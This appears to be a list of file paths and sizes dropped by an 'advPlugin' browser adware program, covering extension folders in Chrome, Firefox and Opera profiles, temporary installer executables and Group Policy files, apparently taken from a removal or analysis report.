C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\te\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\advPlugin_restartonfail\InstallAfterRebootService0.exe (5110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\vi\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\zh_TW\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\background.html (69 bytes)
%Program Files% (x86)\advPlugin\files\_locales\id\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\popup.html (361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ml\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\files\proxy.js (364 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\background.xul (452 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\fa\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\fr\messages.json (371 bytes)
%Program Files% (x86)\advPlugin\files\_locales\mr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\el\messages.json (463 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\de\messages.json (338 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\zh_CN\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\icons\icon64.png (5 bytes)
%Program Files% (x86)\advPlugin\Toolbar64.tlb (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\pt_PT\messages.json (349 bytes)
%Program Files% (x86)\advPlugin\files\_locales\sr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\files\popup.js (3 bytes)
%Program Files% (x86)\advPlugin\install.inf (278 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\skin\styles.css (257 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\es\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\fi\messages.json (346 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\es_419\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\es\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sl\messages.json (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\files\popup.css (192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\gu\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\no\messages.json (328 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\bootstrap.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\sv\messages.json (344 bytes)
C:\Windows\SysWOW64\GroupPolicy\Adm\chrome.adm (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\popup.js (659 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\en_GB\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\Loader.exe (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\es_419\messages.json (371 bytes)
%Program Files% (x86)\advPlugin\files\_locales\pt\messages.json (349 bytes)
%Program Files% (x86)\advPlugin\files\_locales\sw\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\am\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\en\messages.json (343 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\ms\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\zh_CN\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\fr\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\fa\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\skin\bindings.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\fr\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\popup.js (659 bytes)
%Program Files% (x86)\advPlugin\files\_locales\de\messages.json (338 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\ja\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\am\messages.json (341 bytes)
C:\Windows\SysWOW64\GroupPolicy\Machine\Registry.pol (582 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\pt\messages.json (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\el\messages.json (463 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\en\messages.json (343 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\ru\messages.json (431 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\am\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\te\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\sv\messages.json (344 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\he\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\vi\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\ar\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\kn\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\mr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\te\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\mk\messages.json (428 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\da\messages.json (345 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\sv\messages.json (344 bytes)
%Program Files% (x86)\advPlugin\files\_locales\zh_TW\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\am\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\mr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\zh_TW\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\uk\messages.json (476 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\it\messages.json (361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\fil\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\lt\messages.json (369 bytes)
%Program Files% (x86)\advPlugin\files\_locales\it\messages.json (361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\bn\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\kn\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\InstallerHelper.dll (11663 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\files\background.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\Kernel.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\lt\messages.json (369 bytes)
%Program Files% (x86)\advPlugin\files\_locales\hr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome.manifest (78 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\skin\bindings.xml (1 bytes)
%Program Files% (x86)\advPlugin\files\files\popup.css (192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\popup.html (199 bytes)
%Program Files% (x86)\advPlugin\files\_locales\hi\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\no\messages.json (328 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\fil\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ta\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ru\messages.json (431 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\bg\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\files\background.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\th\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\files\popup.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\en_US\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\skin\bindings.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\pt_BR\messages.json (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\ro\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\sw\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\da\messages.json (345 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\ca\messages.json (352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\lv\messages.json (355 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\es\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\pt_PT\messages.json (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\icons\icon48.png (3 bytes)
%Program Files% (x86)\advPlugin\files\_locales\ro\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\Kernel.js (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\he\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\advPlugin_restartonfail\commandLineToRun.txt (82 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sv\messages.json (344 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\Kernel.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\en_GB\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\id\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\icon16.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\icons\icon19.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\es\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\nl\messages.json (362 bytes)
%Program Files% (x86)\advPlugin\info.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\skin\arrow.png (332 bytes)
%Program Files% (x86)\advPlugin\files\_locales\et\messages.json (326 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\mk\messages.json (428 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\ja\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\nl\messages.json (362 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\tr\messages.json (355 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\sk\messages.json (337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\kn\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\icons\icon19.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\en_GB\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ko\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\sq\messages.json (366 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ca\messages.json (352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\background.html (69 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\files\background.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\icons\icon48.png (3 bytes)
%Program Files% (x86)\advPlugin\files\_locales\te\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\lv\messages.json (355 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ru\messages.json (431 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\be\messages.json (437 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\icons\icon128.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\icons\icon16.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\tr\messages.json (355 bytes)
%Program Files% (x86)\advPlugin\files\_locales\es\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\files\popup.css (192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\files\popup.js (3 bytes)
%Program Files% (x86)\advPlugin\files\_locales\ru\messages.json (431 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\fr\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\sl\messages.json (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\advPlugin_restartonfail_exe\JUR0CxdplxCY.exe (14988 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\fa\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\ms\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\it\messages.json (361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\da\messages.json (345 bytes)
%Program Files% (x86)\advPlugin\files\background.html (129 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\hr\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\fr\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\pt\messages.json (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\sr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ro\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ms\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\th\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ja\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sk\messages.json (337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\kn\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\ja\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\cs\messages.json (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\ru\messages.json (431 bytes)
%Program Files% (x86)\advPlugin\Toolbar32.tlb (2 bytes)
%Program Files% (x86)\advPlugin\files\files\background.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\be\messages.json (437 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\en_US\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\bg\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\mr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sw\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\hr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\th\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\be\messages.json (437 bytes)
